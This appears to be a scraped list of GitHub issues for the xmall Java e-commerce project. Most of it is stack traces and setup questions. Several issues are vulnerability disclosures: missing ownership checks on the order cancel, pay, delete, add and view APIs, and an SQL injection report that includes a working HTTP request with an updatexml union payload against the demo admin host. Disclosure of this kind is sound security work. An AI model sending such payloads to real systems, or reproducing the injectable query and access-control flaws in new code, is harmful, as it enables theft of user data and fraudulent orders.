exrick / xmall Goto Github PK

[item] IndexNotFoundException[no such index]
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.indexNotFoundException(IndexNameExpressionResolver.java:728)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.innerResolve(IndexNameExpressionResolver.java:680)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.resolve(IndexNameExpressionResolver.java:636)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.concreteIndices(IndexNameExpressionResolver.java:163)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.concreteIndices(IndexNameExpressionResolver.java:138)
at org.elasticsearch.action.search.TransportSearchAction.resolveLocalIndices(TransportSearchAction.java:287)
at org.elasticsearch.action.search.TransportSearchAction.executeSearch(TransportSearchAction.java:301)
at org.elasticsearch.action.search.TransportSearchAction.lambda$doExecute$4(TransportSearchAction.java:193)
at org.elasticsearch.action.ActionListener$1.onResponse(ActionListener.java:60)
at org.elasticsearch.index.query.Rewriteable.rewriteAndFetch(Rewriteable.java:114)
at org.elasticsearch.index.query.Rewriteable.rewriteAndFetch(Rewriteable.java:87)
at org.elasticsearch.action.search.TransportSearchAction.doExecute(TransportSearchAction.java:215)
at org.elasticsearch.action.search.TransportSearchAction.doExecute(TransportSearchAction.java:68)
at org.elasticsearch.action.support.TransportAction$RequestFilterChain.proceed(TransportAction.java:167)
at org.elasticsearch.xpack.security.action.filter.SecurityActionFilter.apply(SecurityActionFilter.java:124)
at org.elasticsearch.action.support.TransportAction$RequestFilterChain.proceed(TransportAction.java:165)
at org.elasticsearch.action.support.TransportAction.execute(TransportAction.java:139)
at org.elasticsearch.action.support.HandledTransportAction$TransportHandler.messageReceived(HandledTransportAction.java:83)
at org.elasticsearch.action.support.HandledTransportAction$TransportHandler.messageReceived(HandledTransportAction.java:73)
at org.elasticsearch.xpack.security.transport.SecurityServerTransportInterceptor$ProfileSecuredRequestHandler$1.doRun(SecurityServerTransportInterceptor.java:250)
at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
at org.elasticsearch.xpack.security.transport.SecurityServerTransportInterceptor$ProfileSecuredRequestHandler.messageReceived(SecurityServerTransportInterceptor.java:308)
at org.elasticsearch.transport.RequestHandlerRegistry.processMessageReceived(RequestHandlerRegistry.java:66)
at org.elasticsearch.transport.TcpTransport$RequestHandler.doRun(TcpTransport.java:1288)
at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
at org.elasticsearch.common.util.concurrent.EsExecutors$1.execute(EsExecutors.java:140)
2019-10-12 09:39:48,654 [DubboServerHandler-172.21.63.129:20882-thread-15] [com.alibaba.dubbo.rpc.filter.ExceptionFilter]-[ERROR] [DUBBO] Got unchecked and undeclared exception which called by 172.21.63.129. service: cn.exrick.search.service.SearchService, method: search, exception: cn.exrick.common.exception.XmallException: 查询ES索引库出错, dubbo version: 2.6.1, current host: 172.21.63.129
at org.elasticsearch.transport.TcpTransport.handleRequest(TcpTransport.java:1246)
cn.exrick.common.exception.XmallException: 查询ES索引库出错
at org.elasticsearch.transport.TcpTransport.messageReceived(TcpTransport.java:1110)
at cn.exrick.search.service.impl.SearchServiceImpl.search(SearchServiceImpl.java:176)
at org.elasticsearch.transport.TcpTransport.inboundMessage(TcpTransport.java:913)
at org.elasticsearch.transport.netty4.Netty4MessageChannelHandler.channelRead(Netty4MessageChannelHandler.java:53)
at com.alibaba.dubbo.common.bytecode.Wrapper1.invokeMethod(Wrapper1.java)
at com.alibaba.dubbo.rpc.proxy.javassist.JavassistProxyFactory$1.doInvoke(JavassistProxyFactory.java:45)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.rpc.proxy.AbstractProxyInvoker.invoke(AbstractProxyInvoker.java:71)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.config.invoker.DelegateProviderMetaDataInvoker.invoke(DelegateProviderMetaDataInvoker.java:48)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at com.alibaba.dubbo.rpc.protocol.InvokerWrapper.invoke(InvokerWrapper.java:52)
at io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:323)
at com.alibaba.dubbo.rpc.filter.ExceptionFilter.invoke(ExceptionFilter.java:61)
at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:297)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.monitor.support.MonitorFilter.invoke(MonitorFilter.java:74)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340) at com.alibaba.dubbo.rpc.filter.TimeoutFilter.invoke(TimeoutFilter.java:41)

at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.handler.logging.LoggingHandler.channelRead(LoggingHandler.java:241)
at com.alibaba.dubbo.rpc.protocol.dubbo.filter.TraceFilter.invoke(TraceFilter.java:77)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.rpc.filter.ContextFilter.invoke(ContextFilter.java:71)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1434)
at com.alibaba.dubbo.rpc.filter.GenericFilter.invoke(GenericFilter.java:131)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at com.alibaba.dubbo.rpc.filter.ClassLoaderFilter.invoke(ClassLoaderFilter.java:37)
at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:965)
at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:163)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:656)
at com.alibaba.dubbo.rpc.filter.EchoFilter.invoke(EchoFilter.java:37)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:556)
at com.alibaba.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102)
at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:510)
at com.alibaba.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:96)
at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:470)
at com.alibaba.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:168)
at io.netty.util.concurrent.SingleThreadEventExecutor$5.run(SingleThreadEventExecutor.java:909)
at com.alibaba.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:50)
at java.lang.Thread.run(Thread.java:745)
at com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:79)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)

Recently, our team found an arbitrary order cancel vulnerability in the latest version of the project.

The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L54
Unauthorized access to the /member/cancelOrder API enables attackers to manipulate the post param order and cancel orders belonging to other users.

To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the cancel operation.

我这边 通过 npm run build 然后把dist目录下的文件放到Tomcat中， 看前端 默认的是 去 请求的 http://localhost:8080 这个地址的 接口。而我的后台服务 部署在另外一台电脑上

Recently, our team found an arbitrary order free payment vulnerability in the latest version of the project. The vulnerability logic is located within the following file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L70

Unauthorized access to the /member/payOrder API allows attackers to manipulate the POST parameter tbThanks, thereby altering the payment status of any order, resulting in unauthorized free payments.

To mitigate this vulnerability, we strongly recommend that developers implement access control policies to restrict changes to the payment status.

Recently, our team found an arbitrary order detail access vulnerability in the latest version of the project.

The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L28

Access to the /member/orderList API is unauthorized, allowing attackers to manipulate the query param userId and access other users' order details, potentially compromising user privacy data.

To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.

http://localhost:8081/swagger-ui.html

[Suggested description]
Xmall was discovered to contain a SQL injection vulnerability via the orderDir parameter.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/Exrick/xmall

[Affected Product Code Base]
all version

[Affected Component]

• /item/list
• /item/listSearch
• /sys/log
• /order/list
• /member/list (need time-based blind injection)
• /member/list/remove

[Attack Type]
Remote

[Vulnerability details]
Send the payload below to the interface /item/list

GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: xmadmin.exrick.cn
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Referer: http://xmadmin.exrick.cn/product-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Cookie: JSESSIONID=359A406116392BB0456356EFBCF068FC
Connection: close

[Impact Code execution]
true

[Cause of vulnerability]
In the /item/list interface, the order[0][dir] parameter is not filtered and passed into the getItemList function.

Then it is passed into the selectItemByCondition function.

In xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml, the orderDir parameter is used in ${} format, leading to a SQL injection vulnerability.

And there are the other similar interfaces:

• /item/listSearch
• /sys/log
• /order/list
• /member/list (need time-based blind injection)
• /member/list/remove (need time-based blind injection)

That's all, thanks.

目前方案存在的问题，为什么

• 目前使用Redis存储购物车数据，内存数据宝贵，购物车数据后期可能很大

如何解决/优化

• 使用MySQL或MongoDB

rt

修改请求中的userId可以往他人购物车中添加商品或者获取他人订单信息。

访问 首页商城 没有响应

Recently, our team found an arbitrary order deletion vulnerability in the latest version of the project.

The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L62
Unauthorized access to the /member/delOrder API enables attackers to manipulate the query param orderId and delete orders belonging to other users.

To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the delete operation.

请问你的购物车商品数据是直接放在redis而没有持久化到mysql吗？如果是这样的话是否合理呢？

目前方案存在的问题，为什么

• 虽然MySQL任意隔离级别都可避免更新丢失，但并发量高的时候仍会存在数据库的丢失更新造成超售问题

如何解决/优化

• 隔离级别最高SERIALIZABLE，但串行不可取
• 乐观锁 update x set num = x where id = x and num = 原库存数，单表推荐
• 若要处理多个表可使用分布式锁，参考xboot项目
• 秒杀场景：使用Redis事务+watch

GET http://localhost:8888/lib/gt.js net::ERR_ABORTED
导致
$.ajax({ url: '/geetestInit?t=' + (new Date()).getTime(), // 加随机数防止缓存 type: "GET", dataType: 'json', success: function (data) { initGeetest({ gt: data.gt, challenge: data.challenge, new_captcha: data.new_captcha, // 用于宕机时表示是新验证码的宕机 offline: !data.success, // 表示用户后台检测极验服务器是否宕机，一般不需要关注 product: "popup", // 产品形式，包括：float(点击汉字)，popup(滑动) width: "100%" }, handler); } });
这里无法初始化

你这个是基于单商户还是多商户？

请问1G内存小机器跑商场前后端项目够用吗？

大佬的商城自动发送邮件的功能这部分可能出故障了，希望大佬看到后发一份单体版的xmall，时间有点紧急，麻烦了

Recently, our team found an arbitrary order detail access vulnerability (different with #79) in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L36

The developer failed to check the ownership of the order with the access user when querying the order details via orderService.getOrder(), allowing attackers to manipulate the query param orderId of API /member/orderDetail and access other users' order details, potentially compromising user privacy data.

To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.

请教有没有做持续集成的思路，现在因为不同模块没有1个总的pom.xml文件，卡在编译这块。谢谢。

亲！可以看你一下你的数据库设计吗？

支付成功后没有小程序源码吗

很多用户相关的操作都没有进行权限验证。项目中token基本没有用到

能够将视频教程，改造成这样的开源项目确实牛逼。膜拜下作者👍

后台管理系统分享一下源代码

Recently, our team found an arbitrary order addition vulnerability in the latest version of the project.

The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L46
Access to the /member/addOrder API is unauthorized, allowing attackers to add orders as any user via a crafted orderInfo object.

To address this vulnerability, we strongly recommend that developers implement access control policies to limit the order addition operation.

应该不是我网络的问题。

大神。el-autocomplete，搜索线上没实现，是功能没完善吗？

设置了ElasticSearch的ik分词器，但是前台商城搜索商品时，不支持中文搜索

{"success":false,"message":"你手速怎么这么快，请点慢一点","code":500,"timestamp":1545190498198,"result":null} 是啥问题

更换旧版本火狐浏览器，还可以用。

请问能看一下么

Hi

I found a security vulnerability in the XMALL application.
Where should I disclose it?

Thanks,
Ori.

此项目将作为作者2018年本科毕业设计项目，现提前开源，请勿盗用。完成毕业设计后将完成部署、完善详细文档、项目架构等内容。

org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'shiroFilter': Unsatisfied dependency expressed through field 'systemService'; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'systemService': FactoryBean threw exception on object creation; nested exception is java.lang.IllegalStateException: Failed to check the status of the service cn.exrick.manager.service.SystemService. No provider available for the service cn.exrick.manager.service.SystemService from the url zookeeper://127.0.0.1:2181/com.alibaba.dubbo.registry.RegistryService?application=xmall-manager-web&dubbo=2.6.1&interface=cn.exrick.manager.service.SystemService&methods=countLog,deleteLog,getLogList,updateBase,getWeekHot,getShiroFilter,countShiroFilter,addLog,addShiroFilter,getBase,updateShiroFilter,deleteShiroFilter&pid=42124&register.ip=169.254.135.39&revision=1.0-SNAPSHOT&side=consumer&timestamp=1529023738625 to the consumer 169.254.135.39 use dubbo version 2.6.

@Exrick

你好，单机版本的搜索功能一直提示出错，请问是否有修正